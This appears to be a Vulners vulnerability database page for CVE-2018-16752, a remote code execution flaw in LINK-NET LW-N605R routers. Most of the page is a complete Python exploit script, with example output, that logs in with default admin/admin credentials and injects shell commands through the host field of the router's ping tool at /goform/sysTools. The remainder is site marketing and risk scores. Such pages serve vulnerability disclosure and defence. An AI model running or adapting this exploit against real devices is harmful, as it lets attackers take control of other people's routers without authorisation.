Vulners
Lucene search
LW-N605R Remote Code Execution
| Reporter | Title | Published | Views | Family All 6 |
|---|---|---|---|---|
 | LW-N605R Remote Code Execution Vulnerability | 12 Sep 201800:00 | – | cnvd |
 | CVE-2018-16752 | 20 Sep 201820:00 | – | cve |
 | CVE-2018-16752 | 20 Sep 201820:00 | – | cvelist |
 | CVE-2018-16752 | 20 Sep 201820:29 | – | nvd |
 | Default credentials | 20 Sep 201820:29 | – | prion |
 | VulnCheck KEV: CVE-2018-16752 | 3 Jan 202400:00 | – | vulncheck_kev |
`'''
# Title: LW-N605R - Remote Code Execution
# Author: Nassim Asrir
# Contact: [email protected] | https://www.linkedin.com/in/nassim-asrir-b73a57122/
# Vendor: LINK-NET
# Description: LW-N605R devices allow Remote Code Execution via shell metacharacters in the HOST field of the ping feature at adm/systools.asp.
Authentication is needed but the default password of admin for the admin account may be used in some cases.
# CVE: CVE-2018-16752
# Example:
aa[root@parrot]a[/home/sniperpex/Desktop]
aaaa1/4 #python ./blue.py -t http://host/ -c ls -u admin -p admin
_ __ __ _ _ __ ___ ____ ____ _____ _ _ _
| |\ \ / / | \ | |/ /_ / _ \| ___|| _ \ | ____|_ ___ __ | | ___ (_) |_
| | \ \ /\ / /____| \| | '_ \| | | |___ \| |_) | | _| \ \/ / '_ \| |/ _ \| | __|
| |__\ V V /_____| |\ | (_) | |_| |___) | _ < | |___ > <| |_) | | (_) | | |_
|_____\_/\_/ |_| \_|\___/ \___/|____/|_| \_\ |_____/_/\_\ .__/|_|\___/|_|\__|
|_|
@AsrirNassim
[+] Connection in progress...
[+] Authentication in progress...
[+] Username & Password: OK
[+] Checking for vulnerability...
[!] Command "ls": was executed!
var
usr
tmp
sys
sbin
proc
mnt
media
lib
init
home
etc_ro
etc
dev
bin
'''
import urllib2
import base64
import optparse
import sys
import bs4
banner = """
_ __ __ _ _ __ ___ ____ ____ _____ _ _ _
| |\ \ / / | \ | |/ /_ / _ \| ___|| _ \ | ____|_ ___ __ | | ___ (_) |_
| | \ \ /\ / /____| \| | '_ \| | | |___ \| |_) | | _| \ \/ / '_ \| |/ _ \| | __|
| |__\ V V /_____| |\ | (_) | |_| |___) | _ < | |___ > <| |_) | | (_) | | |_
|_____\_/\_/ |_| \_|\___/ \___/|____/|_| \_\ |_____/_/\_\ .__/|_|\___/|_|\__|
|_|
@AsrirNassim
"""
# Check url
def checkurl(url):
if url[:8] != "https://" and url[:7] != "http://":
print('[X] You must insert http:// or https:// procotol')
sys.exit(1)
else:
return url+"/goform/sysTools"
def connectionScan(url,user,pwd,cmd):
print '[+] Connection in progress...'
try:
response = urllib2.Request(url)
content = urllib2.urlopen(response)
print '[X] LW-N605R Authentication not found'
except urllib2.HTTPError, e:
if e.code == 404:
print '[X] Page not found'
elif e.code == 401:
try:
print '[+] Authentication in progress...'
base64string = base64.encodestring('%s:%s' % (user, pwd)).replace('\n', '')
response = urllib2.Request(url+"/goform/sysTools?tool=0&pingCount=4&host=127.0.0.1;"+cmd+"&sumbit=OK", None)
response.add_header("Authorization", "Basic %s" % base64string)
content = urllib2.urlopen(response).read()
if "putmsg(mPingCount);" in content:
print '[+] Username & Password: OK'
print '[+] Checking for vulnerability...'
if 'e' in content:
print '[!] Command "'+cmd+'": was executed!'
else:
print '[X] Not Vulnerable :('
else:
print '[X] No LW-N605R page found'
soup = bs4.BeautifulSoup(content, 'html.parser')
for textarea in soup.find_all('textarea'):
print textarea.get_text()
except urllib2.HTTPError, e:
if e.code == 401:
print '[X] Wrong username or password'
else:
print '[X] HTTP Error: '+str(e.code)
except urllib2.URLError:
print '[X] Connection Error'
else:
print '[X] HTTP Error: '+str(e.code)
except urllib2.URLError:
print '[X] Connection Error'
commandList = optparse.OptionParser('usage: %prog -t https://target:444/ -u admin -p pwd -c "ls"')
commandList.add_option('-t', '--target', action="store",
help="Insert TARGET URL",
)
commandList.add_option('-c', '--cmd', action="store",
help="Insert command name",
)
commandList.add_option('-u', '--user', action="store",
help="Insert username",
)
commandList.add_option('-p', '--pwd', action="store",
help="Insert password",
)
options, remainder = commandList.parse_args()
# Check args
if not options.target or not options.cmd or not options.user or not options.pwd:
print(banner)
commandList.print_help()
sys.exit(1)
print(banner)
url = checkurl(options.target)
cmd = options.cmd
user = options.user
pwd = options.pwd
connectionScan(url,user,pwd,cmd)
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
10 Sep 2018 00:00Current
8.9High risk
Vulners AI Score8.9
EPSS0.48743